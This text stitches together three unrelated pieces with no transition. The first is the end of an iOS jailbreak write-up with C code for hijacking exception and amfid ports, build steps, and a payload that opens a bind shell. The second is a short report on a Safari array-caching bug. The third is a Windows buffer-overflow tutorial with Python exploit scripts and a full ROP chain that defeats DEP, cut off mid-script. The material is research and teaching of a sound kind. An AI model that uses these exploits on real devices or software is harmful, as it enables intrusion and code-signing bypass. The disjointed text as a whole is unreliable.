  4. Using our execution context in druid, make druid call host_set_exception_ports to register our Mach port as the host-level exception handler for EXC_BAD_ACCESS.

After this stage, any time a process accesses an invalid memory address (and also does not have a registered exception handler), an EXC_BAD_ACCESS exception message will be sent to our new exception handler port. This will give us the task port of any crashing process, and since EXC_BAD_ACCESS is a recoverable exception, this time we can use the task port to execute code.
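
Expressed as code running in druid’s context, the registration is just a pair of calls. This is a sketch with my own names: host_priv and new_handler are the ports sent over in step 3, and the saved handler is what stage 5 later restores.

#include <mach/mach.h>

void install_host_handler(host_priv_t host_priv, mach_port_t new_handler,
                          exception_handler_t *old_handler_out) {
    exception_mask_t       masks[EXC_TYPES_COUNT];
    mach_msg_type_number_t masks_count = EXC_TYPES_COUNT;
    exception_handler_t    old_handlers[EXC_TYPES_COUNT];
    exception_behavior_t   old_behaviors[EXC_TYPES_COUNT];
    thread_state_flavor_t  old_flavors[EXC_TYPES_COUNT];
    // Step 1: remember the current host-level EXC_BAD_ACCESS handler.
    host_get_exception_ports(host_priv, EXC_MASK_BAD_ACCESS, masks, &masks_count,
                             old_handlers, old_behaviors, old_flavors);
    *old_handler_out = old_handlers[0];
    // Step 4: install our own port as the host-level EXC_BAD_ACCESS handler.
    host_set_exception_ports(host_priv, EXC_MASK_BAD_ACCESS, new_handler,
                             EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES, THREAD_STATE_NONE);
}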

Stage 4: Getting ReportCrash’s task port

The next stage is to trigger an EXC_BAD_ACCESS exception in ReportCrash so that its task port gets sent in an exception message to our new exception handler port:

  1. Crash ReportCrash using the previously described technique. This will cause ReportCrash to generate an EXC_BAD_ACCESS exception. Since ReportCrash has no exception handler registered for EXC_BAD_ACCESS (remember, SafetyNet is registered for EXC_CRASH), the exception will be delivered to the host-level exception handler.
  2. Listen for exception messages on our host exception handler port.
  3. When we receive the exception message for ReportCrash, save the task and thread ports. Suspend the crashing thread and return KERN_SUCCESS to indicate to the kernel that the exception has been handled and ReportCrash can be resumed.
  4. Use the task and thread ports to establish an execution context inside ReportCrash just like we did with druid.

At this point, we have code execution inside an unsandboxed, root, task_for_pid-allow process.

Stage 5: Restoring the original host-level exception handler

The next two stages aren’t strictly necessary but should be performed anyway.

Once we have code execution inside ReportCrash, we should reset the host-level exception handler for EXC_BAD_ACCESS using druid:

  1. Send the old host-level exception handler port over to druid.
  2. Call host_set_exception_ports in druid to re-register the old host-level exception handler for EXC_BAD_ACCESS.

This will stop our exception handler port from receiving exception messages for other crashing processes.

Stage 6: Fixing up launchd

The last step is to restore the damage we did to launchd when we freed service ports in its IPC namespace in order to impersonate them:

  1. Call task_for_pid in ReportCrash to get launchd’s task port.
  2. For each service we impersonated:
    1. Get launchd’s name for the send right to the fake service port. This is the original name of the real service port.
    2. Destroy the fake service port, deregistering the fake service with launchd.
    3. Call mach_port_insert_right in ReportCrash to push the real service port into launchd’s IPC space under the original name.

After this step is done, the system should once again be fully functional. After successful exploitation, there should be no need to force reset the device, since the exploit repairs all the damages itself.
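
For reference, the heart of step 2.3 is a single Mach call made from inside ReportCrash. This is a sketch; launchd_task, original_name and real_service_port stand for the values gathered in the earlier steps.

#include <mach/mach.h>

// Re-insert the real service port into launchd's IPC space under the name it
// originally occupied, restoring normal service lookups.
kern_return_t restore_service(mach_port_t launchd_task, mach_port_name_t original_name,
                              mach_port_t real_service_port) {
    return mach_port_insert_right(launchd_task, original_name,
                                  real_service_port, MACH_MSG_TYPE_COPY_SEND);
}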

Post-exploitation

Blanket also packages a post-exploitation payload that bypasses amfid and spawns a bind shell. This section will describe how that is achieved.

Spawning a payload process

Even after gaining code execution in ReportCrash, using that capability is not easy: we are limited to performing individual function calls from within the process, which makes it painful to perform complex tasks. Ideally, we’d like a way to run code natively with ReportCrash’s privileges, either by injecting code into ReportCrash or by spawning a new process with the same (or higher) privileges.

Blanket chooses the process spawning route. We use task_for_pid and our platform binary status in ReportCrash to get launchd’s task port and create a new thread inside of launchd that we can control. We then use that thread to call posix_spawn to launch our payload binary. The payload binary can be signed with restricted entitlements, including task_for_pid-allow, to grant additional capabilities.

Bypassing amfid

In order for iOS to accept our newly spawned binary, we need to bypass codesigning. Various strategies have been discussed over the years, but the most common current strategy is to register an exception handler for amfid and then perform a data patch so that amfid crashes when trying to call MISValidateSignatureAndCopyInfo. This allows us to fake the implementation of that function to pretend that the code signature is valid.

However, there’s another approach which I believe is more robust and flexible: rather than patching amfid at all, we can simply register a new amfid port in the kernel.

The kernel keeps track of which port to send messages to amfid using a host special port called HOST_AMFID_PORT. If we have unsandboxed root code execution, we can set this port to a new value. Apple has protected against this attack by checking whether the reply to a validation request really came from amfid: the cdhash of the sender is compared to amfid’s cdhash. However, this doesn’t actually prevent the message from being sent to a process other than amfid; it only prevents the reply from coming from a non-amfid process. If we set up a triangle where the kernel sends messages to us, we generate the reply and pass it to amfid, and then amfid sends the reply to the kernel, then we’ll be able to bypass the sender check.
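
Rerouting the kernel’s codesigning queries then takes only a pair of host special port calls once we have unsandboxed root code execution. The sketch below uses my own names; HOST_AMFID_PORT comes from XNU’s host_special_ports.h and is not in the public SDK, so verify the value against your kernel headers.

#include <mach/mach.h>
#include <mach/host_special_ports.h>

#ifndef HOST_AMFID_PORT
#define HOST_AMFID_PORT 18  // iOS 11-era value; check XNU's host_special_ports.h
#endif

void hijack_amfid_port(host_priv_t host_priv, mach_port_t our_port,
                       mach_port_t *real_amfid_out) {
    // Remember the real amfid port so validated replies can still be routed
    // through the genuine amfid (the "triangle" described above).
    host_get_special_port(host_priv, HOST_LOCAL_NODE, HOST_AMFID_PORT, real_amfid_out);
    // Point the kernel's verification requests at a port we own instead.
    host_set_special_port(host_priv, HOST_AMFID_PORT, our_port);
}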

There are numerous advantages to this approach, of which the biggest is probably access to additional flags in the verify_code_directory service routine. Even though amfid does not use them all, there are many other output flags that amfid could set to control the behavior of codesigning. Here’s a partial prototype of verify_code_directory:

kern_return_t
verify_code_directory(
		mach_port_t    amfid_port,
		amfid_path_t   path,
		uint64_t       file_offset,
		int32_t        a4,
		int32_t        a5,
		int32_t        a6,
		int32_t *      entitlements_valid,
		int32_t *      signature_valid,
		int32_t *      unrestrict,
		int32_t *      signer_type,
		int32_t *      is_apple,
		int32_t *      is_developer_code,
		amfid_a13_t    a13,
		amfid_cdhash_t cdhash,
		audit_token_t  audit);

Of particular interest for jailbreak developers is the is_apple parameter. This parameter does not appear to be used by amfid, but if set, it will cause the kernel to set the CS_PLATFORM_BINARY codesigning flag, which grants the application platform binary privileges. In particular, this means that the application can now use task ports to modify platform binaries directly.

Loopholes used in this attack

This attack takes advantage of several loopholes that aren’t security vulnerabilities themselves but do minimize the effectiveness of various exploit mitigations. Not all of these need to be closed together, since some are partially redundant, but it’s worth listing them all anyway.

In the kernel:

  1. task_threads can promote an inspect-only task_inspect_t to a modify-capable thread_act_t.
  2. There is no thread_conversion_eval to perform the role of task_conversion_eval for threads.
  3. A non-platform binary may use a task_inspect_t right for a platform binary.
  4. Exception messages for unsandboxed processes may be delivered to sandboxed processes, even though that provides a way to escape the sandbox. It’s not clear whether there is a clean fix for this loophole.
  5. Unsandboxed code execution, the host-priv port, and the ability to crash a task_for_pid-allow process can be combined to build a task_for_pid workaround. (The workaround is: call host_set_exception_ports to set a new host-level exception handler, then crash the task_for_pid-allow process to receive its task port and execute code with the entitlement.)

In app extensions:

  1. App extensions that share an application group can communicate using Mach messages, despite the documentation suggesting that communication between the host app and the app extension should be impossible.

Recommended fixes and mitigations

I recommend the following fixes, roughly in order of importance:

  1. Only deallocate Mach ports in the launchd service routines when returning KERN_SUCCESS. This will fix the Mach port replacement vulnerability.
  2. Close the task_threads loophole allowing a non-platform binary to use the task port of a platform binary to achieve code execution.
  3. Fix crashing issues in ReportCrash.
  4. The set of Mach services reachable from within the container sandbox should be minimized. I do not see a legitimate reason for most iOS apps to communicate with ReportCrash or SafetyNet.
  5. As many processes as possible should be sandboxed. I’m not sure whether druid needs to be unsandboxed to function properly, but if not, it should be placed in an appropriate sandbox.
  6. Dead code should be eliminated. SafetyNet does not seem to be performing its intended functionality. If it is no longer needed, it should probably be removed.
  7. Close the host_set_exception_ports-based task_for_pid workaround. For example, consider whether it’s worth restricting host_set_exception_ports to root or restricting the usability of the host-priv port under some configurations. This violates the elegant capabilities-based design of Mach, but host_set_exception_ports might be a promising target for abuse.
  8. Consider whether it’s worth adding task_conversion_eval to task_inspect_t.

Running blanket

Blanket should work on any device running iOS 11.2.6.

  1. Download the project:
    git clone https://github.com/bazad/blanket
    cd blanket
    
  2. Download and build the threadexec library, which is required for blanket to inject code in processes and tasks:
    git clone https://github.com/bazad/threadexec
    cd threadexec
    make ARCH=arm64 SDK=iphoneos EXTRA_CFLAGS='-mios-version-min=11.1 -fembed-bitcode'
    cd ..
    
  3. Download Jonathan Levin’s iOS binpack, which contains the binaries that will be used by the bind shell. If you change the payload to do something else, you won’t need the binpack.
    mkdir binpack
    curl http://newosxbook.com/tools/binpack64-256.tar.gz | tar -xf- -C binpack
    
  4. Open Xcode and configure the project. You will need to change the signing identifier and specify a custom application group entitlement.
  5. Edit the file headers/config.h and change APP_GROUP to whatever application group identifier you specified earlier.

After that, you should be able to build and run the project on the device.

If blanket is successful, it will run the payload binary (source in blanket_payload/blanket_payload.c), which by default spawns a bind shell on port 4242. You can connect to that port with netcat and run arbitrary shell commands.

Credits

Many thanks to Ian Beer and Jonathan Levin for their excellent iOS security and internals research.

Timeline

Apple assigned the Mach port replacement vulnerability in launchd CVE-2018-4280, and it was patched in iOS 11.4.1 and macOS 10.13.6 on July 9.

Serious bug: Array state will be cached in iOS 12 Safari.

There is a problem with Array value state in the newly released iOS 12 Safari. For example, consider code like this:

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
    <title>iOS 12 Safari bugs</title>
    <script type="text/javascript">
    window.addEventListener("load", function ()
    {
        let arr = [1, 2, 3, 4, 5];
        alert(arr.join());

        document.querySelector("button").addEventListener("click", function ()
        {
            arr.reverse();
        });
    });
    </script>
</head>
<body>
    <button>Array.reverse()</button>
    <p style="color:red;">test: click button and refresh page, code:</p>
</body>
</html>

It’s definitely a BUG! And it’s a very serious bug.

From my testing, the bug is due to the optimization of array initializers whose values are all primitive literals. For example, () => [1, null, 'x'] will return such arrays, and all returned arrays point to the same memory address; some methods like toString() are also memoized. Normally, any mutating operation on such an array will copy it to an individual memory space and link to it; this is the so-called copy-on-write (CoW) technique (https://en.wikipedia.org/wiki/Copy-on-write).

The reverse() method mutates the array, so it should trigger CoW. Unfortunately, it doesn’t, which causes the bug.

On the other hand, all methods that do not modify the array should not trigger CoW, and I found that even a.fill(value, 0, 0) or a.copyWithin(index, 0, 0) won’t trigger CoW, because such calls don’t really mutate the array. But I noticed that a.slice() WILL trigger CoW. So I guess the real reason for this bug may be that someone accidentally swapped slice and reverse.

I’ve added a demo page; try it in iOS 12 Safari: https://cdn.miss.cat/demo/ios12-safari-bug.html

Thanks.

Zero Day Zen Garden: Windows Exploit Development — Part 5 [Return Oriented Programming Chains]

Hello again! Welcome to another post on Windows exploit development. Today we’re going to be discussing a technique called Return Oriented Programming (ROP) that’s commonly used to get around a type of exploit mitigation called Data Execution Prevention (DEP). This technique is slightly more advanced than previous exploitation methods, but it’s well worth learning because DEP is a protective mechanism that is now employed on a majority of modern operating systems. So without further ado, it’s time to up your exploit development game and learn how to commit a roppery!

Setting up a Windows 7 Development Environment

So far we’ve been doing our exploitation on Windows XP as a way to learn how to create exploits in an OS that has fewer security mechanisms to contend with. It’s important to start simple when you’re learning something new! But, it’s now time to take off the training wheels and move on to a more modern OS with additional exploit mitigations. For this tutorial, we’ll be using a Windows 7 virtual machine environment. Thankfully, Microsoft provides Windows 7 VMs for demoing their Internet Explorer browser. They will work nicely for our purposes here today so go ahead and download the VM from here.

Next, load it into VirtualBox and start it up. Install Immunity Debugger, Python and mona.py again as instructed in the previous blog post here. When that’s ready, you’re all set to start learning ROP with our target software VUPlayer which you can get from the Exploit-DB entry we’re working off here.

Finally, make sure DEP is turned on for your Windows 7 virtual machine by going to Control Panel > System and Security > System, clicking on Advanced system settings, then clicking Settings… and going to the Data Execution Prevention tab. Select ‘Turn on DEP for all programs and services except those I select:’ and restart your VM to ensure DEP is turned on.

With that, you should be good to follow along with the rest of the tutorial.

Data Execution Prevention and You!

Let’s start things off by confirming that a vulnerability exists and write a script to cause a buffer overflow:

vuplayer_rop_poc1.py

buf = "A"*3000
 
print "[+] Creating .m3u file of size "+ str(len(buf))
 
file = open('vuplayer-dep.m3u','w');
file.write(buf);
file.close();
 
print "[+] Done creating the file"

Attach Immunity Debugger to VUPlayer and run the script, drag and drop the output file ‘vuplayer-dep.m3u’ into the VUPlayer dialog and you’ll notice that our A character string overflows a buffer to overwrite EIP.

Great! Next, let’s find the offset by writing a script with a pattern buffer string. Generate the buffer with the following mona command:

!mona pc 3000

Then copy paste it into an updated script:

vuplayer_rop_poc2.py

buf = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9"
 
print "[+] Creating .m3u file of size "+ str(len(buf))
 
file = open('vuplayer-dep.m3u','w');
file.write(buf);
file.close();
 
print "[+] Done creating the file"

Restart VUPlayer in Immunity and run the script, drag and drop the file then run the following mona command to find the offset:

!mona po 0x68423768

post_image

post_image

Got it! The offset is at 1012 bytes into our buffer and we can now update our script to add in an address of our choosing. Let’s find a jmp esp instruction we can use with the following mona command:

!mona jmp -r esp

Ah, I see a good candidate at address 0x1010539f in the output files from Mona:

post_image

Let’s plug that in and insert a mock shellcode payload of INT instructions:

vuplayer_rop_poc3.py

import struct
 
BUF_SIZE = 3000
 
junk = "A"*1012
eip = struct.pack('<L', 0x1010539f)
 
shellcode = "\xCC"*200
 
exploit = junk + eip + shellcode
 
fill = "\x43" * (BUF_SIZE - len(exploit))
 
buf = exploit + fill
 
print "[+] Creating .m3u file of size "+ str(len(buf))
 
file = open('vuplayer-dep.m3u','w');
file.write(buf);
file.close();

print "[+] Done creating the file"

Time to restart VUPlayer in Immunity again and run the script. Drag and drop the file and…

post_image

Nothing happened? Huh? How come our shellcode payload didn’t execute? Well, that’s where Data Execution Prevention is foiling our evil plans! The OS is not allowing us to interpret the “0xCC” INT instructions as planned; instead it simply refuses to execute the data we provided, so the program crashes rather than running our shellcode. But there is a glimmer of hope! We were able to execute the “JMP ESP” instruction just fine, right? So there is SOME code we can execute: it just has to be existing code rather than arbitrary data like we have used in the past. This is where we get creative and build a program out of a chain of assembly instructions, just like the “JMP ESP” we ran before, that live in code sections which are allowed to be executed. Time to learn about ROP!

Problems, Problems, Problems

Let’s start off by thinking about what the core of our problem here is. DEP is preventing the OS from interpreting our shellcode data “\xCC” as an INT instruction; instead it’s throwing up its hands and saying “I have no idea what in fresh hell this 0xCC stuff is! I’m just going to fail…” whereas without DEP it would say “Ah! Look at this, I interpret 0xCC to be an INT instruction, I’ll just go ahead and execute this instruction for you!”. With DEP enabled, certain sections of memory (like the stack where our INT shellcode resides) are marked as NON-EXECUTABLE (NX), meaning data there cannot be interpreted by the OS as an instruction. But nothing about DEP says we can’t execute existing program instructions that are marked as executable, like, for example, the code making up the VUPlayer program! This is demonstrated by the fact that we could execute the JMP ESP code, because that instruction was found in the program itself and was therefore marked as executable so the program can run. However, the 0xCC shellcode we stuffed in is new; we placed it in a region that was marked as non-executable.

ROP to the Rescue

So, we now arrive at the core of the Return Oriented Programming technique. What if, we could collect a bunch of existing program assembly instructions that aren’t marked as non-executable by DEP and chain them together to tell the OS to make our shellcode area executable? If we did that, then there would be no problem right? DEP would still be enabled but, if the area hosting our shellcode has been given a pass by being marked as executable, then it won’t have a problem interpreting our 0xCC data as INT instructions.

ROP does exactly that, those nuggets of existing assembly instructions are known as “gadgets” and those gadgets typically have the form of a bunch of addresses that point to useful assembly instructions followed by a “return” or “RET” instruction to start executing the next gadget in the chain. That’s why it’s called Return Oriented Programming!

But, what assembly program can we build with our gadgets so we can mark our shellcode area as executable? Well, there’s a variety to choose from on Windows but the one we will be using today is called VirtualProtect(). If you’d like to read about the VirtualProtect() function, I encourage you to check out the Microsoft developer page about it here. But, basically it will mark a memory page of our choosing as executable. Our challenge now is to build that function call in assembly using ROP gadgets found in the VUPlayer program.

Building a ROP Chain

So first, let’s establish what we need to put into what registers to get VirtualProtect() to complete successfully. We need to have:

  1. lpAddress: A pointer to an address that describes the starting page of the region of pages whose access protection attributes are to be changed.
  2. dwSize: The size of the region whose access protection attributes are to be changed, in bytes.
  3. flNewProtect: The memory protection option. This parameter can be one of the memory protection constants.
  4. lpflOldProtect: A pointer to a variable that receives the previous access protection value of the first page in the specified region of pages. If this parameter is NULL or does not point to a valid variable, the function fails.

Okay! Our tasks are laid out before us; time to create a program that fulfills all these requirements. We will set lpAddress to the address of our shellcode, dwSize to be 0x201 so we have a sizable chunk of memory to play with, flNewProtect to be 0x40 which will mark the new page as executable through a memory protection constant (complete list can be found here), and finally we’ll set lpflOldProtect to be any static writable location. Then, all that is left to do is call the VirtualProtect() function we just set up and watch the magic happen!
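To make the goal concrete, here is roughly the call the ROP chain is building, written as ordinary code (a hedged sketch; the shellcode buffer and the printf are just for illustration, the argument values come from the text above):

#include <windows.h>
#include <cstdio>

int main() {
    unsigned char shellcode[0x201];   // stand-in for the shellcode sitting on the stack (lpAddress)
    DWORD oldProtect;                 // lpflOldProtect: any writable location
    // flNewProtect = 0x40, i.e. PAGE_EXECUTE_READWRITE
    BOOL ok = VirtualProtect(shellcode, 0x201, PAGE_EXECUTE_READWRITE, &oldProtect);
    printf("VirtualProtect %s\n", ok ? "succeeded" : "failed");
    return 0;
}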

First, let’s find ROP gadgets to build up the arguments our VirtualProtect() function needs. This will become our toolbox for building a ROP chain; we can grab gadgets from executable modules belonging to VUPlayer by checking out the list here:

post_image

To generate a list of usable gadgets from our chosen modules, you can use the following command in Mona:

!mona rop -m "bass,basswma,bassmidi"

post_image

Check out the rop_suggestions.txt file Mona generated and let’s get to building our ROP chain.

post_image

First let’s place a value into EBP for a call to PUSHAD at the end:

0x10010157,  # POP EBP # RETN [BASS.dll]
0x10010157,  # skip 4 bytes [BASS.dll]

Next we set up dwSize (0x201): pop a value into EAX, negate it so EAX becomes 0x201, then move the result into EBX with the following instructions:

0x10015f77,  # POP EAX # RETN [BASS.dll] 
0xfffffdff,  # Value to negate, will become 0x00000201
0x10014db4,  # NEG EAX # RETN [BASS.dll] 
0x10032f72,  # XCHG EAX,EBX # RETN 0x00 [BASS.dll]

Then we do the same for flNewProtect (0x40): negate the value into EAX and move the result into EDX with the following instructions:

0x10015f82,  # POP EAX # RETN [BASS.dll] 
0xffffffc0,  # Value to negate, will become 0x00000040
0x10014db4,  # NEG EAX # RETN [BASS.dll] 
0x10038a6d,  # XCHG EAX,EDX # RETN [BASS.dll]

Next, let’s place our writable location (any valid writable location will do) into ECX for lpflOldProtect.

0x101049ec,  # POP ECX # RETN [BASSWMA.dll] 
0x101082db,  # &Writable location [BASSWMA.dll]

Then, we get some values into the EDI and ESI registers for a PUSHAD call later:

0x1001621c,  # POP EDI # RETN [BASS.dll] 
0x1001dc05,  # RETN (ROP NOP) [BASS.dll]
0x10604154,  # POP ESI # RETN [BASSMIDI.dll] 
0x10101c02,  # JMP [EAX] [BASSWMA.dll]

Finally, we set up the call to the VirtualProtect() function by placing a pointer to VirtualProtect()’s IAT entry (0x1060e25c) in EAX:

0x10015fe7,  # POP EAX # RETN [BASS.dll] 
0x1060e25c,  # ptr to &VirtualProtect() [IAT BASSMIDI.dll]

Then, all that’s left to do is push the registers with our VirtualProtect() argument values to the stack with a handy PUSHAD then pivot to the stack with a JMP ESP:

0x1001d7a5,  # PUSHAD # RETN [BASS.dll] 
0x10022aa7,  # ptr to 'jmp esp' [BASS.dll]

PUSHAD will place the register values on the stack in the following order: EAX, ECX, EDX, EBX, original ESP, EBP, ESI, and EDI. If you’ll recall, this means that the stack will look something like this with the ROP gadgets we used to setup the appropriate registers:

| EDI (0x1001dc05) |
| ESI (0x10101c02) |
| EBP (0x10010157) |
================
VirtualProtect() Function Call args on stack
| ESP (0x0012ecf0) | ← lpAddress [JMP ESP + NOPS + shellcode]
| 0x201 | ← dwSize
| 0x40 | ← flNewProtect
| &WritableLocation (0x101082db) | ← lpflOldProtect
| &VirtualProtect (0x1060e25c) | ← VirtualProtect() call
================

Now our stack will be setup to correctly call the VirtualProtect() function! The top param hosts our shellcode location which we want to make executable, we are giving it the ESP register value pointing to the stack where our shellcode resides. After that it’s the dwSize of 0x201 bytes. Then, we have the memory protection value of 0x40 for flNewProtect. Then, it’s the valid writable location of 0x101082db for lpflOldProtect. Finally, we have the address for our VirtualProtect() function call at 0x1060e25c.

With the JMP ESP instruction, EIP will point to the VirtualProtect() call and we will have succeeded in making our shellcode payload executable. Then, it will slide down a NOP sled into our shellcode which will now work beautifully!

Updating Exploit Script with ROP Chain

It’s time now to update our Python exploit script with the ROP chain we just discussed, you can see the script here:

vuplayer_rop_poc4.py


import struct
 
BUF_SIZE = 3000
 
def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x10010157,  # POP EBP # RETN [BASS.dll]
      0x10010157,  # skip 4 bytes [BASS.dll]
      0x10015f77,  # POP EAX # RETN [BASS.dll]
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x10014db4,  # NEG EAX # RETN [BASS.dll]
      0x10032f72,  # XCHG EAX,EBX # RETN 0x00 [BASS.dll]
      0x10015f82,  # POP EAX # RETN [BASS.dll]
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x10014db4,  # NEG EAX # RETN [BASS.dll]
      0x10038a6d,  # XCHG EAX,EDX # RETN [BASS.dll]
      0x101049ec,  # POP ECX # RETN [BASSWMA.dll]
      0x101082db,  # &Writable location [BASSWMA.dll]
      0x1001621c,  # POP EDI # RETN [BASS.dll]
      0x1001dc05,  # RETN (ROP NOP) [BASS.dll]
      0x10604154,  # POP ESI # RETN [BASSMIDI.dll]
      0x10101c02,  # JMP [EAX] [BASSWMA.dll]
      0x10015fe7,  # POP EAX # RETN [BASS.dll]
      0x1060e25c,  # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
      0x1001d7a5,  # PUSHAD # RETN [BASS.dll]
      0x10022aa7,  # ptr to 'jmp esp' [BASS.dll]
    ]
